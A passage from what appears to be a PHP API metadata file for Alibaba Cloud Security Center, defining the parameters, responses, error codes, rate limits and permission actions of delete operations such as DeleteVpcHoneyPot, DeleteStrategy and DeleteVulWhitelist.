Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7532B7EE-7CE7-5F4D-BF04-B12447DDCAE1\\"\\n}","type":"json"}]', ], 'DeleteSearchCondition' => [ 'summary' => 'Deletes a saved search condition from the Assets module of Security Center.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'abilityTreeCode' => '91971', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '19.12.XX.XX', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the saved search condition.'."\n" .'> Call the [DescribeSearchCondition](~~DescribeSearchCondition~~) operation to obtain the name.', 'type' => 'string', 'required' => true, 'example' => 'test', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The asset type. Default value: ecs. Valid values:'."\n" ."\n" .'- **ecs**: host asset'."\n" .'- **cloud_product**: cloud service.', 'type' => 'string', 'required' => false, 'example' => 'ecs', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '2983C540-E51F-582A-B510-732C27CD914C', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete a saved search condition', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteSearchCondition'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteSearchCondition', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"2983C540-E51F-582A-B510-732C27CD914C\\"\\n}","type":"json"}]', ], 'DeleteSecurityEventMarkMissList' => [ 'summary' => 'Deletes multiple custom defense rules at a time. The custom defense rules are used to add false positive alerts to the whitelist.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => true, 'systemTags' => ['operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'autoTest' => false], 'parameters' => [ [ 'name' => 'Ids', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of custom defense rule.'."\n", 'type' => 'array', 'items' => ['description' => 'The ID of the custom defense rule.'."\n" ."\n" .'> You can call the [DescribeSecurityEventMarkMissList](~~2384532~~) operation to query the ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '123', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => '23AD0BD2-8771-5647-819E-6BA51E2XXXXX', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => [ 'substitutions' => ['Sas::2018-12-03::ModifySecurityEventMarkMissIndividually'], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"23AD0BD2-8771-5647-819E-6BA51E2XXXXX\\"\\n}","type":"json"}]', 'title' => 'DeleteSecurityEventMarkMissList', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteSecurityEventMarkMissList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DeleteServiceTrail' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '160789', 'abilityTreeNodes' => ['FEATUREsasNB8R24'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'RegionId', 'in' => 'query', 'schema' => ['description' => 'The region of the Security Center instance. Valid values:'."\n" ."\n" .'- **cn-hangzhou:** China'."\n" .'- **ap-southeast-1:** Singapore.', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each request. You can use the request ID to troubleshoot issues.', 'type' => 'string', 'example' => '20456DD5-5CBF-5015-9173-12CA4246B***', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete actionTrail data delivery', 'summary' => 'Deletes an ActionTrail data delivery configuration.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteServiceTrail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteServiceTrail', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'SasTrail', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:sastrail/*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"20456DD5-5CBF-5015-9173-12CA4246B***\\"\\n}","type":"json"}]', ], 'DeleteSoarStrategyTask' => [ 'summary' => 'Deletes a policy task that is in the waiting state from the task center.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'abilityTreeCode' => '91973', 'abilityTreeNodes' => ['FEATUREsasEX82TR'], ], 'parameters' => [ [ 'name' => 'StrategyTaskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the policy task that is in the waiting state.'."\n" .'>Call the [DescribeSoarStrategyTasks](~~2837958~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '11082', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'C699E4E4-F2F4-58FC-A949-457FFE59****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Delete a task center task', 'description' => 'Only the Enterprise and Ultimate editions of Security Center support this API call. Other editions are not supported.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteSoarStrategyTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteSoarStrategyTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"C699E4E4-F2F4-58FC-A949-457FFE59****\\"\\n}","type":"json"}]', ], 'DeleteStrategy' => [ 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '91974', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '192.0.XX.XX', 'title' => ''], ], [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the policy to delete.', 'type' => 'string', 'required' => true, 'example' => '1404656', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each API request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ConsoleError', 'errorMessage' => 'The error message is %s %s.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete a policy', 'summary' => 'Deletes a baseline check policy.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteStrategy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteStrategy', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'BaselineStrategy', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:baselinestrategy/{#BaselineStrategyId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7\\"\\n}","type":"json"}]', ], 'DeleteSuspEventNode' => [ 'summary' => 'Deletes the description of an alert.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'abilityTreeCode' => '157293', 'abilityTreeNodes' => ['FEATUREsas731ZAS'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'NoteId', 'in' => 'query', 'schema' => ['description' => 'The ID of the description.'."\n" ."\n" .'> You can call the [DescribeSuspEvents](~~DescribeSuspEvents~~) operation to obtain the ID of the description by using the EventNotes field.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '123', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The additional information that is returned.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => 'A57C711B-AA15-55B2-8F61-4D09CEXXXXX', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"A57C711B-AA15-55B2-8F61-4D09CEXXXXX\\"\\n}","type":"json"}]', 'title' => 'DeleteSuspEventNode', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteSuspEventNode'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteSuspEventNode', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DeleteTagWithUuid' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'TagName', 'in' => 'query', 'schema' => ['description' => 'The label name.', 'type' => 'string', 'required' => true, 'example' => 'abc', 'title' => ''], ], [ 'name' => 'UuidList', 'in' => 'query', 'schema' => ['description' => 'The list of server UUIDs.'."\n" .'> If UuidList is specified, Security Center deletes the label only from the servers included in UuidList. If UuidList is empty, Security Center deletes the label from all servers.', 'type' => 'string', 'required' => false, 'example' => '111-xx,aa-bb', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for this request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92719F', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete asset labels', 'summary' => 'Deletes custom labels bound to assets.', 'description' => 'Asset labels are classified into asset importance labels and custom labels. When you call this operation, only custom labels bound to assets can be deleted. Asset importance labels cannot be deleted.', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteTagWithUuid'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteTagWithUuid', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\"\\n}","type":"json"}]', ], 'DeleteUniBackupPolicy' => [ 'summary' => 'Deletes anti-ransomware policies that are created for databases.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'delete'], 'parameters' => [ [ 'name' => 'PolicyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the anti-ransomware policy.'."\n" ."\n" .'> You can call the [DescribeUniBackupPolicies](~~DescribeUniBackupPolicies~~) operation to query the IDs of anti-ransomware policies. You must specify at least one of the PolicyId parameter and the **PolicyIds** parameter.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '123', 'title' => ''], ], [ 'name' => 'PolicyIds', 'in' => 'query', 'schema' => ['description' => 'The IDs of anti-ransomware policies.'."\n" ."\n" .'> You can call the [DescribeUniBackupPolicies](~~DescribeUniBackupPolicies~~) operation to query the IDs of anti-ransomware policies. You must specify at least one of the **PolicyId** parameter and the PolicyIds parameter.'."\n", 'type' => 'string', 'required' => false, 'example' => '123,124', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '4F07F4F1-88ED-5569-B519-FFCC9B7E****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DeleteUniBackupPolicy', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteUniBackupPolicy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteUniBackupPolicy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"4F07F4F1-88ED-5569-B519-FFCC9B7E****\\"\\n}","type":"json"}]', ], 'DeleteUnknownThreatDetectProcess' => [ 'summary' => 'Deletes one or more Unknown Threat Detect processes.', 'path' => '', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasXNUPZF'], 'autoTest' => true, 'tenantRelevance' => 'tenant', ], 'parameters' => [ [ 'name' => 'ProcessIdList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'type' => 'array', 'items' => ['description' => 'The process ID.', 'type' => 'string', 'required' => false, 'example' => '123', 'title' => ''], 'maxItems' => 100, 'description' => 'The IDs of the processes to delete.', 'required' => false, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The unique ID of the request.', 'type' => 'string', 'title' => '', 'example' => '3956048F-9D73-5EDB-834B-4827BB******'], ], 'title' => '', 'description' => 'The response data.', 'example' => '', ], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'DeleteUnknownThreatDetectProcess', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteUnknownThreatDetectProcess', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3956048F-9D73-5EDB-834B-4827BB******\\"\\n}","type":"json"}]', ], 'DeleteUnknownThreatDetectStrategy' => [ 'path' => '', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasXNUPZF'], 'autoTest' => true, 'tenantRelevance' => 'tenant', ], 'parameters' => [ [ 'name' => 'IdList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of policy IDs.', 'type' => 'array', 'items' => ['description' => 'The policy ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '123', 'title' => ''], 'required' => false, 'example' => '123', 'maxItems' => 100, 'title' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'Id of the request', 'type' => 'string', 'example' => 'D03DD0FD-6041-5107-AC00-383E28F1****'], ], 'example' => '', ], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Delete a behavior analytics policy', 'summary' => 'Deletes a behavior analytics policy.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteUnknownThreatDetectStrategy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D03DD0FD-6041-5107-AC00-383E28F1****\\"\\n}","type":"json"}]', ], 'DeleteVpcHoneyPot' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'delete'], 'parameters' => [ [ 'name' => 'VpcId', 'in' => 'query', 'schema' => ['description' => 'The VPC ID of the honeypot instance that you want to delete.'."\n" ."\n" .'> You can call the [DescribeVpcHoneyPotList](~~DescribeVpcHoneyPotList~~) operation to obtain the VPC ID of the honeypot instance.', 'type' => 'string', 'required' => true, 'example' => 'vpc-d7o009q63fqy21r8u****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each request. You can use the request ID to troubleshoot issues.', 'type' => 'string', 'example' => '4347E985-6E64-467B-96EC-30D4EA9E32FB', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'HoneyPotNotExists', 'errorMessage' => 'Honey pot not exists.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete a honeypot', 'summary' => 'Deletes a specified honeypot instance.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteVpcHoneyPot', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"4347E985-6E64-467B-96EC-30D4EA9E32FB\\"\\n}","type":"json"}]', ], 'DeleteVulAutoRepairConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'delete', 'abilityTreeCode' => '134325', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The type of the vulnerability. Valid values: '."\n" .'- cve: Linux software vulnerability '."\n" .'- sys: Windows system vulnerability.', 'type' => 'string', 'required' => false, 'example' => 'cve'], ], [ 'name' => 'AliasName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The alias of the vulnerability.', 'type' => 'string', 'required' => false, 'example' => 'RHSA-2017:0184-Important: mysql security update'], ], [ 'name' => 'ConfigIdList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of configuration IDs to delete.'."\n" .'> You can call the [ListVulAutoRepairConfig](~~ListVulAutoRepairConfig~~) operation to obtain configuration IDs.', 'type' => 'array', 'items' => ['description' => 'The configuration ID to delete.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '3956048F-9D73-5EDB-834B-4827BB48****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'InnerError', 'errorMessage' => 'InnerError', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete automatic fix configurations from the vulnerability task center', 'summary' => 'Deletes the configurations of vulnerabilities that can be automatically fixed in the vulnerability task center in batches.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteVulAutoRepairConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'delete', 'ramAction' => [ 'action' => 'yundun-sas:DeleteVulAutoRepairConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3956048F-9D73-5EDB-834B-4827BB48****\\"\\n}","type":"json"}]', ], 'DeleteVulWhitelist' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], ], 'parameters' => [ [ 'name' => 'Whitelist', 'in' => 'query', 'schema' => ['description' => 'The vulnerability whitelist information to delete. The value is a JSON string that contains the following fields:'."\n" ."\n" .'- **Name**: The name of the vulnerability.'."\n" .'- **Type**: The type of the vulnerability. Valid values:'."\n" ."\n" .' - **cve**: Linux software vulnerability'."\n" .' - **sys**: Windows system vulnerability'."\n" .' - **cms**: Web-CMS vulnerability'."\n" .' - **app**: application vulnerability'."\n" .' - **emg**: emergency vulnerability'."\n" ."\n" .'- **AliasName**: The alias of the vulnerability.', 'type' => 'string', 'required' => false, 'example' => '['."\n" .' {'."\n" .' "Name": "oval:com.redhat.rhsa:def:20173263",'."\n" .' "Type": "cve",'."\n" .' "AliasName": "RHSA-2017:3263: curl security update"'."\n" .' }'."\n" .']', 'title' => ''], ], [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the vulnerability whitelist.'."\n" .'> To delete a vulnerability whitelist, provide the vulnerability whitelist ID. You can obtain this ID by calling the [DescribeVulWhitelist](~~DescribeVulWhitelist~~) operation.', 'type' => 'string', 'required' => false, 'example' => '131231', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '9FBC6E47-7508-58C9-9E76-528E118CB1CC', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete a specified vulnerability whitelist', 'summary' => 'Deletes a specified vulnerability whitelist.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 